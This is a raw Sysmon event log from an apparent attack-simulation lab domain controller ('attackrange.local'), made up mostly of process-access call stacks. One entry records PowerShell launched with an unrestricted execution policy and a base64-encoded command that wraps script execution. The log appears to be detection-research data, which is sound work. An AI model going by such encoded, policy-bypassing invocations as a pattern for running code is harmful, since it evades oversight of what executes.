15:52:07.495{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003151Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:07.495{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003150Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:07.495{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003149Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:07.495{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003148Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:07.495{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003147Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:07.495{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003146Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:07.495{D28789B6-7C62-5FA1-0500-000000008801}644660C:\Windows\system32\csrss.exe{D28789B6-7CA7-5FA1-9600-000000008801}4372C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003145Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:07.495{D28789B6-7CA7-5FA1-9500-000000008801}26002764C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CA7-5FA1-9600-000000008801}4372C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31d4331b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e41a5(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e3e76(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31c954db(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311a4a0c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31202edb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e63d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311d8356(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e4889(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e447c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e41a5(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e3e76(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31c954db(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311cacd7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311ca2a7(wow64) 154100x80000000000000003144Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:07.498{D28789B6-7CA7-5FA1-9600-000000008801}4372C:\Windows\System32\chcp.com10.0.14393.0 (rs1_release.160715-1616)Change CodePage UtilityMicrosoft® Windows® Operating SystemMicrosoft CorporationCHCP.COM"C:\Windows\system32\chcp.com" 65001C:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7CA7-5FA1-A343-060000000000}0x643a30HighMD5=BA6FD5B883C0899785D17CEBE66A25F6,SHA256=9FDBDF88CF2BB2794C416E3083553F2898AC9DC92DFAC2478B4C1DF667DF7C74,IMPHASH=4FB30D6E330F3FB3DB61550BD7FA7CCD{D28789B6-7CA7-5FA1-9500-000000008801}2600C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 10341000x80000000000000003143Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:07.479{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003142Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:07.479{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003141Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:07.479{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003140Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:07.432{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7CA7-5FA1-9500-000000008801}2600C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003139Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:07.432{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7CA7-5FA1-9500-000000008801}2600C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000003138Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:07.401{D28789B6-7CA7-5FA1-9500-000000008801}2600C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_sox55qya.htv.ps12020-11-03 15:52:07.401 10341000x80000000000000003137Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:07.385{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7CA7-5FA1-9500-000000008801}2600C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003136Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:07.354{D28789B6-7CA7-5FA1-9200-000000008801}5048668C:\Windows\system32\conhost.exe{D28789B6-7CA7-5FA1-9500-000000008801}2600C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003135Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:07.354{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003134Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:07.354{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003133Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:07.354{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003132Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:07.354{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003131Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:07.354{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003130Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 